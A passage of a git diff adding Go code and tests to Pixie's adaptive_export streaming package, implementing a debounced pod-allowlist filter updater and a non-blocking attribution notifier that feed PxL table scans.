+// +// SPDX-License-Identifier: Apache-2.0 + +// Package streaming implements the rev-3 push-flow: long-running +// PxL submissions per pixie table, with a pod allowlist derived from +// the ActiveSet. See .local/adaptive-write-rev3-plan.md for the full +// architectural rationale. +package streaming + +import ( + "context" + "sync" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// FilterMode selects how the embedded PxL allowlist is constructed. +type FilterMode int + +const ( + // FilterModeAllowlist embeds an explicit pod list in the PxL + // `df = df[df.pod.in_([...])]` clause. Optimal while the set is + // small. + FilterModeAllowlist FilterMode = iota + + // FilterModeUnfiltered emits the script WITHOUT a pod filter — + // the stream returns ALL pods on this node. Used when the active + // set exceeds MaxAllowlistSize: the PxL script-size limit + parse + // cost would dominate; we prefer to pull everything and filter + // in the operator's CH writer. Memory-speed filtering beats + // linear-in-N PxL parse cost. + FilterModeUnfiltered +) + +// String for log output. +func (m FilterMode) String() string { + switch m { + case FilterModeAllowlist: + return "allowlist" + case FilterModeUnfiltered: + return "unfiltered" + default: + return "unknown" + } +} + +// Filter is the immutable snapshot that a TableScanner uses to +// produce one PxL submission. +type Filter struct { + Mode FilterMode + Pods []activeset.Key // populated iff Mode == Allowlist + Version uint64 // ActiveSet version this filter was derived from +} + +// UpdaterConfig tunes the FilterUpdater. +type UpdaterConfig struct { + // Debounce coalesces multiple ActiveSet deltas into one filter + // emission. With many concurrent activations (e.g. cluster-wide + // incident), this caps re-submission rate at 1 / Debounce per + // TableScanner. 0 → 1 second default. 
+ Debounce time.Duration + + // MaxAllowlistSize is the threshold at which we switch to + // FilterModeUnfiltered. 0 → 500 default. -1 disables the cap + // (allowlist always; PxL parse cost is yours to own). + MaxAllowlistSize int + + // SubscribeBuffer is the per-subscriber delta buffer size on the + // underlying ActiveSet subscription. 0 → 32 default. + SubscribeBuffer int +} + +func (c UpdaterConfig) defaulted() UpdaterConfig { + if c.Debounce <= 0 { + c.Debounce = 1 * time.Second + } + if c.MaxAllowlistSize == 0 { + c.MaxAllowlistSize = 500 + } + if c.SubscribeBuffer <= 0 { + c.SubscribeBuffer = 32 + } + return c +} + +// FilterUpdater bridges ActiveSet → TableScanner. It subscribes to +// ActiveSet deltas, debounces them, and emits a coalesced Filter on +// its output channel. Run() owns one goroutine. +type FilterUpdater struct { + set *activeset.ActiveSet + cfg UpdaterConfig + + // deltaCh is the underlying ActiveSet subscription, established + // at construction (not in Run) so callers can deterministically + // Upsert into `set` after NewUpdater returns and know those + // upserts will be delivered. Without this, Run's goroutine + // might not have subscribed to the set yet when the first + // Upsert lands → silent drop. + deltaCh <-chan activeset.Delta + + mu sync.Mutex + subs []chan Filter + closed bool +} + +// NewUpdater wires an updater AND establishes its ActiveSet +// subscription. Call Run(ctx) to start its goroutine. +func NewUpdater(set *activeset.ActiveSet, cfg UpdaterConfig) *FilterUpdater { + d := cfg.defaulted() + return &FilterUpdater{ + set: set, + cfg: d, + deltaCh: set.Subscribe(d.SubscribeBuffer), + } +} + +// Subscribe returns a buffered channel that receives a fresh Filter +// after each debounce window in which one or more deltas landed. +// Plus one initial Filter representing the current snapshot, so a +// subscriber can build its first PxL submission without waiting. +// +// Channel is closed when ctx (from Run) is cancelled. 
+func (u *FilterUpdater) Subscribe() <-chan Filter { + u.mu.Lock() + defer u.mu.Unlock() + ch := make(chan Filter, 4) + if !u.closed { + // Seed with the current snapshot so first PxL submission + // doesn't have to wait for a delta to arrive. + ch <- u.computeFilter() + } + u.subs = append(u.subs, ch) + return ch +} + +// Run owns the FilterUpdater goroutine until ctx is cancelled. +// +// Lifecycle: +// +// deltaCh = set.Subscribe(buffer) +// for { +// select { +// case <-ctx.Done(): close subs; return +// case <-deltaCh: schedule a fire at now+Debounce (idempotent) +// case <-fireTimer: compute filter; broadcast to subs +// } +// } +// +// The fire-timer is rearmed only when a delta arrives; in steady +// state with no deltas, this goroutine is dormant. +func (u *FilterUpdater) Run(ctx context.Context) { + defer u.closeSubs() + defer u.set.Unsubscribe(u.deltaCh) + + var pendingTimer *time.Timer + var pendingC <-chan time.Time + arm := func() { + if pendingTimer != nil { + return // already scheduled + } + pendingTimer = time.NewTimer(u.cfg.Debounce) + pendingC = pendingTimer.C + } + disarm := func() { + if pendingTimer != nil { + pendingTimer.Stop() + pendingTimer = nil + pendingC = nil + } + } + + for { + select { + case <-ctx.Done(): + disarm() + return + + case _, ok := <-u.deltaCh: + if !ok { + // ActiveSet shutdown: disarm any pending timer so its + // goroutine doesn't outlive Run trying to send on + // pendingC (CodeRabbit r3379377645). + disarm() + return + } + arm() + + case <-pendingC: + disarm() + f := u.computeFilter() + u.broadcast(f) + log.WithFields(log.Fields{ + "mode": f.Mode, + "pods": len(f.Pods), + "version": f.Version, + }).Info("streaming.FilterUpdater: emitted filter") + } + } +} + +// computeFilter snapshots the ActiveSet and decides whether to embed +// an allowlist or fall back to unfiltered mode based on size. 
+func (u *FilterUpdater) computeFilter() Filter { + keys, version := u.set.Snapshot() + if u.cfg.MaxAllowlistSize > 0 && len(keys) > u.cfg.MaxAllowlistSize { + return Filter{Mode: FilterModeUnfiltered, Version: version} + } + return Filter{Mode: FilterModeAllowlist, Pods: keys, Version: version} +} + +// broadcast non-blockingly delivers to every subscriber. Subscribers +// that fall behind get the OLDEST filter dropped — the newest state +// always reaches them (their PxL re-submission is what matters; old +// filter versions are stale by construction). +func (u *FilterUpdater) broadcast(f Filter) { + u.mu.Lock() + defer u.mu.Unlock() + for _, ch := range u.subs { + select { + case ch <- f: + default: + select { + case <-ch: + default: + } + select { + case ch <- f: + default: + } + } + } +} + +func (u *FilterUpdater) closeSubs() { + u.mu.Lock() + defer u.mu.Unlock() + u.closed = true + for _, ch := range u.subs { + close(ch) + } + u.subs = nil +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter_test.go b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go new file mode 100644 index 00000000000..a9167261377 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go @@ -0,0 +1,233 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +func TestFilterUpdater_DebouncesMultipleDeltas(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + + // Drain the initial snapshot (empty). + <-ch + + // Bombard with 10 distinct upserts inside the debounce window. + for i := 0; i < 10; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + + // Wait one debounce window + slack and count how many filter + // emissions arrived. Should be exactly one — the coalesced one. + deadline := time.After(300 * time.Millisecond) + count := 0 + var lastF Filter + collecting := true + for collecting { + select { + case f := <-ch: + count++ + lastF = f + case <-deadline: + collecting = false + } + } + if count != 1 { + t.Fatalf("expected 1 coalesced filter emission, got %d", count) + } + if len(lastF.Pods) != 10 { + t.Fatalf("expected 10 pods in coalesced filter, got %d", len(lastF.Pods)) + } +} + +func TestFilterUpdater_FallsBackToUnfilteredOnSizeCap(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 20 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch // initial empty + + for i := 0; i < 5; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + select { + case f := <-ch: + if f.Mode != FilterModeUnfiltered { + t.Fatalf("expected unfiltered mode (5 > cap 3), got %v", f.Mode) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no filter emission") + } +} + +// TestFilterUpdater_CapBoundary_AtLimit — exactly MaxAllowlistSize 
+// pods MUST stay in allowlist mode (not flip to unfiltered). +func TestFilterUpdater_CapBoundary_AtLimit(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + for i := 0; i < 3; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeAllowlist { + t.Fatalf("at exactly cap=3, expected allowlist, got %v", f.Mode) + } + if len(f.Pods) != 3 { + t.Fatalf("expected 3 pods in allowlist, got %d", len(f.Pods)) + } +} + +// TestFilterUpdater_CapBoundary_OneOverLimit — cap+1 pods MUST flip +// to unfiltered. This is the exact boundary just above the cap. +func TestFilterUpdater_CapBoundary_OneOverLimit(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + for i := 0; i < 4; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeUnfiltered { + t.Fatalf("at cap+1=4, expected unfiltered, got %v with %d pods", f.Mode, len(f.Pods)) + } +} + +// TestFilterUpdater_CapBoundary_RecoversAfterShrink — going from +// unfiltered (set was huge) back to a small set MUST switch back to +// allowlist mode. Without this, a transient burst that hit the cap +// would force unfiltered mode forever. 
+func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: 3, + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + + // Burst above cap. + for i := 0; i < 10; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeUnfiltered { + t.Fatalf("expected unfiltered after burst, got %v", f.Mode) + } + // Shrink back below cap. + for i := 3; i < 10; i++ { + set.Remove(activeset.Key{Pod: string(rune('a' + i))}) + } + // Drain any intermediate filters; verify the LATEST emission is + // back to allowlist mode. + deadline := time.Now().Add(500 * time.Millisecond) + last := f + for time.Now().Before(deadline) { + select { + case last = <-ch: + case <-time.After(100 * time.Millisecond): + } + if last.Mode == FilterModeAllowlist { + return // recovered + } + } + t.Fatalf("did not recover to allowlist mode after shrink; last mode=%v pods=%d", + last.Mode, len(last.Pods)) +} + +// TestFilterUpdater_CapDisabled_AllowsAnySize — when MaxAllowlistSize <= 0 +// the cap is disabled and even very large sets stay in allowlist mode. 
+func TestFilterUpdater_CapDisabled_AllowsAnySize(t *testing.T) { + set := activeset.New() + u := NewUpdater(set, UpdaterConfig{ + Debounce: 10 * time.Millisecond, + MaxAllowlistSize: -1, // explicit disable + }) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + <-ch + for i := 0; i < 100; i++ { + set.Upsert(activeset.Key{Pod: string(rune('a'+i%26)) + string(rune('a'+i/26))}, time.Now().Add(time.Minute)) + } + f := waitForFilter(t, ch, 300*time.Millisecond) + if f.Mode != FilterModeAllowlist { + t.Fatalf("with cap disabled (=-1), expected allowlist; got %v", f.Mode) + } +} + +// waitForFilter polls ch until a filter shows up, returning it. +func waitForFilter(t *testing.T, ch <-chan Filter, timeout time.Duration) Filter { + t.Helper() + select { + case f := <-ch: + return f + case <-time.After(timeout): + t.Fatalf("no filter within %v", timeout) + return Filter{} + } +} + +func TestFilterUpdater_InitialSnapshotIsSeeded(t *testing.T) { + set := activeset.New() + set.Upsert(activeset.Key{Namespace: "n", Pod: "p1"}, time.Now().Add(time.Minute)) + u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + go u.Run(ctx) + ch := u.Subscribe() + select { + case f := <-ch: + if len(f.Pods) != 1 || f.Pods[0].Pod != "p1" { + t.Fatalf("initial snapshot wrong: %+v", f) + } + case <-time.After(200 * time.Millisecond): + t.Fatalf("no initial filter") + } +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/integration_test.go b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go new file mode 100644 index 00000000000..40e31870a78 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go @@ -0,0 +1,268 @@ +// Copyright 2018- The Pixie Authors. 
+// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "strings" + "sync" + "sync/atomic" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// recordingQuerier captures every PxL string + lets the test inject +// a per-call row count. Useful for verifying that the PxL the scanner +// emits actually carries the allowlist the test set up upstream. +type recordingQuerier struct { + mu sync.Mutex + queries []string + rowsFunc func(pxl string) []map[string]any +} + +func (r *recordingQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) { + r.mu.Lock() + r.queries = append(r.queries, pxl) + r.mu.Unlock() + if r.rowsFunc == nil { + return nil, nil + } + return r.rowsFunc(pxl), nil +} + +func (r *recordingQuerier) all() []string { + r.mu.Lock() + defer r.mu.Unlock() + out := make([]string, len(r.queries)) + copy(out, r.queries) + return out +} + +// countingWriter is a SinkWriter that just counts rows landed +// per-table — proxies an integration-grade check without standing +// up a real CH. 
type countingWriter struct {
	mu       sync.Mutex
	perTable map[string]int64 // rows received so far, keyed by table name; guarded by mu
	calls    atomic.Int64     // number of WritePixieRows invocations
}

// newCountingWriter returns a countingWriter with its per-table map
// initialised, ready for use.
func newCountingWriter() *countingWriter {
	return &countingWriter{perTable: map[string]int64{}}
}

// WritePixieRows adds len(rows) to the running total for table and bumps
// the call counter. It never fails.
func (w *countingWriter) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
	w.mu.Lock()
	defer w.mu.Unlock()
	w.perTable[table] += int64(len(rows))
	w.calls.Add(1)
	return nil
}

// count returns how many rows have been written for table so far
// (zero for a table that was never written).
func (w *countingWriter) count(table string) int64 {
	w.mu.Lock()
	defer w.mu.Unlock()
	return w.perTable[table]
}

// TestIntegration_NotifierToScannerAllowlistFlow — exercises the
// whole rev-3 pipeline minus pixie:
//
//	AttributionNotifier.Submit
//	  → ActiveSet.Upsert
//	  → FilterUpdater (debounce)
//	  → TableScanner.buildPxL (allowlist embedded)
//	  → recordingQuerier (verify PxL contains pod names)
//	  → BatchWriter (verify rows reach sink)
//
// The whole chain runs against a fake pixie (recordingQuerier) and a fake
// sink (countingWriter), so the assertions are made on PxL strings and
// row counts rather than on a live cluster.
func TestIntegration_NotifierToScannerAllowlistFlow(t *testing.T) {
	ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
	defer cancel()

	// Wire up the chain.
	set := activeset.New()
	notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 128})
	updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond})
	q := &recordingQuerier{
		rowsFunc: func(pxl string) []map[string]any {
			// Return 3 rows iff the allowlist contains "wantpod"; else 0.
			if strings.Contains(pxl, "wantpod") {
				return []map[string]any{{"a": 1}, {"a": 2}, {"a": 3}}
			}
			return nil
		},
	}
	w := newCountingWriter()
	writer := NewBatchWriter("pgsql_events", w, WriterConfig{
		BatchEvery: 50 * time.Millisecond,
		BatchRows:  1000,
	})
	scanner := NewScanner(ScannerConfig{
		Table:           "pgsql_events",
		RefreshInterval: 30 * time.Millisecond,
		QueryTimeout:    500 * time.Millisecond,
	}, q, writer, updater.Subscribe())

	// Spin everything up. Each stage runs in its own goroutine and is
	// tracked by wg so the test can wait for a clean shutdown at the end.
	var wg sync.WaitGroup
	wg.Add(4)
	go func() { defer wg.Done(); notif.Run(ctx) }()
	go func() { defer wg.Done(); updater.Run(ctx) }()
	go func() { defer wg.Done(); writer.Run(ctx) }()
	go func() { defer wg.Done(); scanner.Run(ctx) }()

	// Push two pods through the controller-facing API.
	notif.Submit(activeset.Key{Namespace: "n", Pod: "wantpod"}, time.Now().Add(time.Minute))
	notif.Submit(activeset.Key{Namespace: "n", Pod: "other"}, time.Now().Add(time.Minute))

	// Wait (up to 2s, polling every 20ms) for the writer to land
	// non-zero rows.
	deadline := time.Now().Add(2 * time.Second)
	for w.count("pgsql_events") == 0 && time.Now().Before(deadline) {
		time.Sleep(20 * time.Millisecond)
	}
	got := w.count("pgsql_events")
	if got < 3 {
		t.Fatalf("expected ≥3 rows written for pgsql_events, got %d", got)
	}

	// Assert the PxL carried BOTH pods.
	// NOTE(review): this inspects only the most recent query and so
	// presumes both Submits were coalesced into one filter by the
	// updater's debounce — confirm this cannot flake on a slow runner.
	found := q.all()
	if len(found) == 0 {
		t.Fatalf("no PxL queries captured")
	}
	last := found[len(found)-1]
	if !strings.Contains(last, "wantpod") || !strings.Contains(last, "other") {
		t.Fatalf("last PxL missing one of the pods:\n%s", last)
	}

	// Stop every stage and wait for the goroutines to exit.
	cancel()
	wg.Wait()
}

// TestIntegration_EmptyActiveSetSkipsAllQueries — when nothing is
// active, the scanner must NOT issue queries at all.
+func TestIntegration_EmptyActiveSetSkipsAllQueries(t *testing.T) { + ctx, cancel := context.WithTimeout(context.Background(), 500*time.Millisecond) + defer cancel() + + set := activeset.New() + updater := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond}) + q := &recordingQuerier{rowsFunc: func(string) []map[string]any { return nil }} + w := newCountingWriter() + writer := NewBatchWriter("redis_events", w, WriterConfig{BatchEvery: 50 * time.Millisecond}) + scanner := NewScanner(ScannerConfig{Table: "redis_events", RefreshInterval: 30 * time.Millisecond}, q, writer, updater.Subscribe()) + + var wg sync.WaitGroup + wg.Add(3) + go func() { defer wg.Done(); updater.Run(ctx) }() + go func() { defer wg.Done(); writer.Run(ctx) }() + go func() { defer wg.Done(); scanner.Run(ctx) }() + + <-ctx.Done() + wg.Wait() + + if len(q.all()) != 0 { + t.Fatalf("scanner issued %d queries against empty active set; expected 0", len(q.all())) + } +} + +// TestIntegration_PrunePropagatesToScannerAllowlist — when the +// controller's prune fires, the scanner's next PxL must omit the +// pruned pod. 
+func TestIntegration_PrunePropagatesToScannerAllowlist(t *testing.T) { + ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second) + defer cancel() + + set := activeset.New() + notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 64}) + updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond}) + q := &recordingQuerier{} + w := newCountingWriter() + writer := NewBatchWriter("http_events", w, WriterConfig{BatchEvery: 50 * time.Millisecond}) + scanner := NewScanner(ScannerConfig{Table: "http_events", RefreshInterval: 30 * time.Millisecond}, q, writer, updater.Subscribe()) + + var wg sync.WaitGroup + wg.Add(4) + go func() { defer wg.Done(); notif.Run(ctx) }() + go func() { defer wg.Done(); updater.Run(ctx) }() + go func() { defer wg.Done(); writer.Run(ctx) }() + go func() { defer wg.Done(); scanner.Run(ctx) }() + + // Add a SECOND pod so the scanner keeps issuing queries after + // we Remove "soon-pruned" (else it'd just sit in empty-allowlist + // mode and we'd have no way to deterministically witness the + // filter change). + notif.Submit(activeset.Key{Pod: "soon-pruned"}, time.Now().Add(time.Minute)) + notif.Submit(activeset.Key{Pod: "stays"}, time.Now().Add(time.Minute)) + waitForQueryContaining(t, q, "soon-pruned", time.Second) + + preCount := len(q.all()) + notif.SubmitRemove(activeset.Key{Pod: "soon-pruned"}) + + // Event-driven wait: poll until a query AFTER preCount appears + // that does NOT contain the pruned pod. That's the witness that + // the filter update has propagated through notifier → activeset → + // updater (debounce) → scanner. Cap at 2 s. + deadline := time.Now().Add(2 * time.Second) + for time.Now().Before(deadline) { + all := q.all() + for i := preCount; i < len(all); i++ { + if !strings.Contains(all[i], "soon-pruned") { + // Found the post-prune query without the pod. 
+ // Now also assert that NO query in this post-prune + // window contains the pod (defense against a stale + // in-flight submission landing AFTER the new one). + for j := preCount; j < len(all); j++ { + if strings.Contains(all[j], "soon-pruned") && j > i { + cancel() + wg.Wait() + t.Fatalf("post-prune query at idx %d contains pruned pod after a clean query at idx %d:\n%s", + j, i, all[j]) + } + } + cancel() + wg.Wait() + return + } + } + time.Sleep(20 * time.Millisecond) + } + cancel() + wg.Wait() + t.Fatalf("scanner kept issuing queries containing 'soon-pruned' for 2s after Remove; captured %d queries", + len(q.all())-preCount) +} + +// waitForQueryContaining polls the recorder until a query containing +// `needle` appears OR timeout fires. +func waitForQueryContaining(t *testing.T, q *recordingQuerier, needle string, timeout time.Duration) { + t.Helper() + deadline := time.Now().Add(timeout) + for time.Now().Before(deadline) { + for _, pxl := range q.all() { + if strings.Contains(pxl, needle) { + return + } + } + time.Sleep(10 * time.Millisecond) + } + t.Fatalf("no query containing %q within %v; captured: %v", needle, timeout, q.all()) +} diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier.go b/src/vizier/services/adaptive_export/internal/streaming/notifier.go new file mode 100644 index 00000000000..2921630a2ab --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/notifier.go @@ -0,0 +1,166 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
+// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "sync/atomic" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// AttributionNotifier decouples the controller's per-event callback +// (controller.handle) from ActiveSet writes. Without this shim, a +// stalled ActiveSet subscriber (e.g. a slow Supervisor under load) +// could back-pressure controller.handle and stall trigger consumption +// — i.e. lose the operator's main invariant: kubescape events are +// processed in time. +// +// Contract: +// - Submit / SubmitRemove NEVER block. They drop on buffer overflow +// and bump DroppedCount. +// - One Run goroutine consumes the buffer and applies to ActiveSet. +// - Filtered (host-pid / empty pod) events are counted separately so +// drops vs filters can be distinguished in metrics. +type AttributionNotifier struct { + set *activeset.ActiveSet + cfg NotifierConfig + in chan notifyEvent + + dropped atomic.Int64 + filtered atomic.Int64 +} + +// NotifierConfig tunes the notifier. Zero → safe defaults. +type NotifierConfig struct { + // BufferSize is the input chan capacity. 0 → 1024 default. + // Larger absorbs longer consumer stalls; smaller fails faster. + // Producer drops the OLDEST event on overflow (we'd rather lose + // stale activations than fresh ones). + BufferSize int +} + +func (c NotifierConfig) defaulted() NotifierConfig { + if c.BufferSize <= 0 { + c.BufferSize = 1024 + } + return c +} + +// notifyEvent is the discriminated-union we send across the buffer. +type notifyEvent struct { + key activeset.Key + tEnd time.Time + remove bool +} + +// NewAttributionNotifier wires a notifier. Call Run(ctx) to start +// the consumer goroutine. 
+func NewAttributionNotifier(set *activeset.ActiveSet, cfg NotifierConfig) *AttributionNotifier { + c := cfg.defaulted() + return &AttributionNotifier{ + set: set, + cfg: c, + in: make(chan notifyEvent, c.BufferSize), + } +} + +// Submit hands an upsert to the notifier. Never blocks. Drops oldest +// on overflow + bumps DroppedCount. Host-pid (empty Pod) events are +// filtered here so the ActiveSet never sees them. +func (n *AttributionNotifier) Submit(key activeset.Key, tEnd time.Time) { + if key.Pod == "" { + n.filtered.Add(1) + return + } + n.send(notifyEvent{key: key, tEnd: tEnd}) +} + +// SubmitRemove hands a removal. Same non-blocking contract as Submit. +func (n *AttributionNotifier) SubmitRemove(key activeset.Key) { + if key.Pod == "" { + n.filtered.Add(1) + return + } + n.send(notifyEvent{key: key, remove: true}) +} + +// send is the non-blocking enqueue with drop-oldest semantics. +func (n *AttributionNotifier) send(e notifyEvent) { + select { + case n.in <- e: + default: + // Drop the OLDEST event then retry. If retry still fails + // (consumer drained between the two operations and another + // producer raced in), count this submit as dropped. + select { + case <-n.in: + n.dropped.Add(1) + default: + } + select { + case n.in <- e: + default: + n.dropped.Add(1) + } + } +} + +// Run owns one goroutine; drains the buffer until ctx cancellation. +// Best-effort drain on shutdown — anything remaining in the buffer +// after ctx.Done is dropped. +func (n *AttributionNotifier) Run(ctx context.Context) { + for { + select { + case <-ctx.Done(): + return + case e := <-n.in: + if e.remove { + n.set.Remove(e.key) + } else { + n.set.Upsert(e.key, e.tEnd) + } + } + } +} + +// DroppedCount returns the number of events lost to buffer overflow. +// Use this as a backpressure signal — non-zero means the consumer +// can't keep up. 
+func (n *AttributionNotifier) DroppedCount() int64 { return n.dropped.Load() } + +// FilteredCount returns the number of events filtered (empty pod). +func (n *AttributionNotifier) FilteredCount() int64 { return n.filtered.Load() } + +// SubmitFromController is a tiny convenience wrapper that matches +// the controller.Config.OnAttribution signature exactly, for +// idiomatic wiring in main.go: +// +// ctlCfg.OnAttribution = notifier.SubmitFromController +func (n *AttributionNotifier) SubmitFromController(namespace, pod string, tEnd time.Time) { + n.Submit(activeset.Key{Namespace: namespace, Pod: pod}, tEnd) +} + +// RemoveFromController matches controller.Config.OnPrune signature. +func (n *AttributionNotifier) RemoveFromController(namespace, pod string) { + n.SubmitRemove(activeset.Key{Namespace: namespace, Pod: pod}) +} + +// (Backpressure logging was deliberately not wired internally to +// avoid coupling the notifier to a particular log cadence. Callers +// observe via DroppedCount() and log on their own schedule.) diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go new file mode 100644 index 00000000000..7ae020bab8d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/streaming/notifier_test.go @@ -0,0 +1,220 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package streaming + +import ( + "context" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset" +) + +// TestNotifier_NeverBlocksCaller — the synchronous callback path +// (controller.handle → cfg.OnAttribution → activeset.Upsert) must +// not block the caller even when the consuming end is slow. +// +// The current design exposes Upsert as a fast in-mem mutation, but +// once we wire a Notifier between controller and ActiveSet, the +// Notifier MUST guarantee bounded latency on the producer side. +func TestNotifier_CallerReturnsImmediatelyEvenIfConsumerStalls(t *testing.T) { + set := activeset.New() + // Deliberately no ctx / Run here — we want a stalled consumer + // to prove producer never blocks. + + n := NewAttributionNotifier(set, NotifierConfig{BufferSize: 32}) + // Start the goroutine but DON'T let it drain — simulate stall + // by NOT calling Run. The producer-side call MUST still return. + // (We never start n.Run here on purpose.) + + start := time.Now() + for i := 0; i < 1000; i++ { + // Submit MORE events than the buffer can hold. + n.Submit(activeset.Key{Pod: "p"}, time.Now().Add(time.Minute)) + } + elapsed := time.Since(start) + if elapsed > 100*time.Millisecond { + t.Fatalf("1000 Submit() calls took %v — producer is blocking on a stalled consumer", elapsed) + } + // Sanity: at least some events were dropped (since we never started Run). + if n.DroppedCount() == 0 { + t.Fatalf("expected DroppedCount > 0 with no consumer, got 0") + } +} + +// TestNotifier_DeliversEventsWhenConsumerKeepsUp — happy path. +// We submit slowly enough vs a generously-sized buffer that the +// consumer trivially keeps up. Tests the basic delivery contract +// without measuring the buffer's drop semantics (that's covered by +// TestNotifier_DroppedCountAccurate). 
